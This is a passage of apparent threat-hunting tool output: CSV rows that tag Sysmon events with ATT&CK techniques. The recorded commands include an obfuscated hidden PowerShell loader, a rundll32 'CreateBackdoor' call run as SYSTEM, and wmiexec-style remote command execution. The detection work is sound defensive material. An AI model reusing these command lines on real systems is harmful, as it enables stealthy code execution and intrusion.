SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-2842-5E1E-0000-0010903C7A00 + 1628 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 336 + + + + + 
Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:44:50.348 + 747F3D96-2842-5E1E-0000-00100C417A00 + 4180 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 url.dll,FileProtocolHandler ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-2842-5E1E-0000-0020FF3A7A00 + 0x7a3aff + 0 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-2842-5E1E-0000-0010903C7A00 + 1628 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 336 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:44:50.348 + 747F3D96-2842-5E1E-0000-00100C417A00 + 4180 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 url.dll,FileProtocolHandler ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-2842-5E1E-0000-0020FF3A7A00 + 0x7a3aff + 0 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-2842-5E1E-0000-0010903C7A00 + 1628 + C:\Windows\System32\wbem\WmiPrvSE.exe + 
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436040.330766,2019-07-30T01:34:00.330766+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh trace stop ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4950 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:58.370 + 747F3D96-6646-5D3F-0000-0010913A8B00 + 6232 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c netsh trace stop + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.46327,2020-03-21T09:00:25.463270+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243558 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.452 + 747F3D96-9F69-5E75-0000-001035972000 + 1388 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 
747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 336 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:44:50.348 + 747F3D96-2842-5E1E-0000-00100C417A00 + 4180 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 url.dll,FileProtocolHandler ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-2842-5E1E-0000-0020FF3A7A00 + 0x7a3aff + 0 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-2842-5E1E-0000-0010903C7A00 + 1628 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// 
)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 336 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:44:50.348 + 747F3D96-2842-5E1E-0000-00100C417A00 + 4180 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 url.dll,FileProtocolHandler ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-2842-5E1E-0000-0020FF3A7A00 + 0x7a3aff + 0 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-2842-5E1E-0000-0010903C7A00 + 1628 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.46327,2020-03-21T09:00:25.463270+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243558 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.452 + 747F3D96-9F69-5E75-0000-001035972000 + 1388 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + 
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1556656012.371714,2019-05-01T00:26:52.371714+04:00,,Threat,Critical,"Found User (NT AUTHORITY\SYSTEM) run Suspicious PowerShell commands that include ( -c ,[Convert]::FromBase64String,hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden , -c ,[Convert]::FromBase64String,hidden,Hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden ,WindowStyle) in event with Command Line ("powershell.exe" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))) and Parent Image :C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , Parent CommandLine (powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);") in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + 
+ + 9809 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:26:52.356 + 365ABB72-AF8C-5CC8-0000-001003361900 + 2484 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "powershell.exe" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-2586-5CC9-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-AF8B-5CC8-0000-0010AC1B1900 + 3872 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1594332367.487274,2020-07-10T02:06:07.487274+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," + + + + 
+ 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 311382 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-07-09 22:05:55.880 + 747F3D96-94C3-5F07-0000-001080B40100 + 3096 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-1350-5F08-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 00000000-0000-0000-0000-000000000000 + 628 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1115] Clipboard Data Collection,1594376435.589722,2020-07-10T14:20:35.589722+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rdpclip.exe ) through command line ( rdpclip ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 311396 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-07-10 10:20:34.877 + 747F3D96-40F2-5F08-0000-0010D8A92C00 + 3304 + C:\Windows\System32\rdpclip.exe + 10.0.17763.1131 (WinBuild.160101.0800) + RDP Clipboard Monitor + Microsoft® Windows® Operating System + Microsoft Corporation + rdpclip.exe + rdpclip + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-94CD-5F07-0000-0020ABBF0300 + 0x3bfab + 1 + Medium + SHA1=0265C1718EC95B025D9719F3B4872826F8F4661F,MD5=9E089ECF8B86983B7A77E3844CD02BB5,SHA256=AF5CAE4B514215E530643A7FEA2D7A47A1B15F6E5610347B217D1ABFA4AE0F92,IMPHASH=E3F33CEBF67721DAC951AFBD20321206 + 747F3D96-1350-5F08-0000-001014C50000 + 824 + C:\Windows\System32\svchost.exe + C:\Windows\System32\svchost.exe -k NetworkService -s TermService + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution 
detected,1584766825.46327,2020-03-21T09:00:25.463270+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243558 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.452 + 747F3D96-9F69-5E75-0000-001035972000 + 1388 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553028568.168278,2019-03-20T00:49:28.168278+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966403 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:49:28.058 + 365ABB72-55D8-5C91-0000-001060C90700 + 3648 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q -u "C:\Windows\AppPatch\Test.SDB " + C:\Windows\System32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 
365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1556656012.371714,2019-05-01T00:26:52.371714+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "powershell.exe" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9809 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:26:52.356 + 365ABB72-AF8C-5CC8-0000-001003361900 + 2484 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "powershell.exe" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-2586-5CC9-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-AF8B-5CC8-0000-0010AC1B1900 + 3872 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 
powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436038.683059,2019-07-30T01:33:58.683059+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4949 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:58.357 + 747F3D96-6646-5D3F-0000-0010A7398B00 + 3868 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line 
Interface,1602975185.822098,2020-10-18T02:53:05.822098+04:00,,Threat,Low,"Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 421227 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 22:53:05.776 + 747F3D96-75D1-5F8B-0000-001088C23300 + 2784 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 + C:\ + MSEDGEWIN10\Administrator + 747F3D96-75D0-5F8B-0000-0020A8A83300 + 0x33a8a8 + 0 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-75D1-5F8B-0000-00101DAB3300 + 2228 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.16 ) to hostname ( ) , IP ( 10.0.2.17 ) and port ( 55683 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 17590 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-14 01:29:00.318 + 365ABB72-19E0-5CDA-0000-001006711000 + 1932 + C:\Windows\System32\mshta.exe + IEWIN7\IEUser + tcp + false + false + 10.0.2.16 + IEWIN7 + 49168 + + false + 10.0.2.17 + + 55683 + + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - 
Process,1602975185.822098,2020-10-18T02:53:05.822098+04:00,,Threat,High,"Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 421227 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 22:53:05.776 + 747F3D96-75D1-5F8B-0000-001088C23300 + 2784 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 + C:\ + MSEDGEWIN10\Administrator + 747F3D96-75D0-5F8B-0000-0020A8A83300 + 0x33a8a8 + 0 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-75D1-5F8B-0000-00101DAB3300 + 2228 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1602975185.822098,2020-10-18T02:53:05.822098+04:00,,Threat,High,"Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 421227 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 22:53:05.776 + 747F3D96-75D1-5F8B-0000-001088C23300 + 2784 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System 
+ Microsoft Corporation + Cmd.Exe + cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 + C:\ + MSEDGEWIN10\Administrator + 747F3D96-75D0-5F8B-0000-0020A8A83300 + 0x33a8a8 + 0 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-75D1-5F8B-0000-00101DAB3300 + 2228 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\sqlsvc) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c set > c:\users\\public\netstat.txt ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 56509 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-11-03 13:51:56.380 + 747F3D96-DB7C-5DBE-0000-0010CF6B9502 + 5004 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c set > c:\users\\public\netstat.txt + C:\Windows\system32\ + MSEDGEWIN10\sqlsvc + 747F3D96-CE3B-5DBE-0000-00201ED50100 + 0x1d51e + 0 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-CE42-5DBE-0000-0010EE430200 + 3936 + C:\Program Files\Microsoft SQL 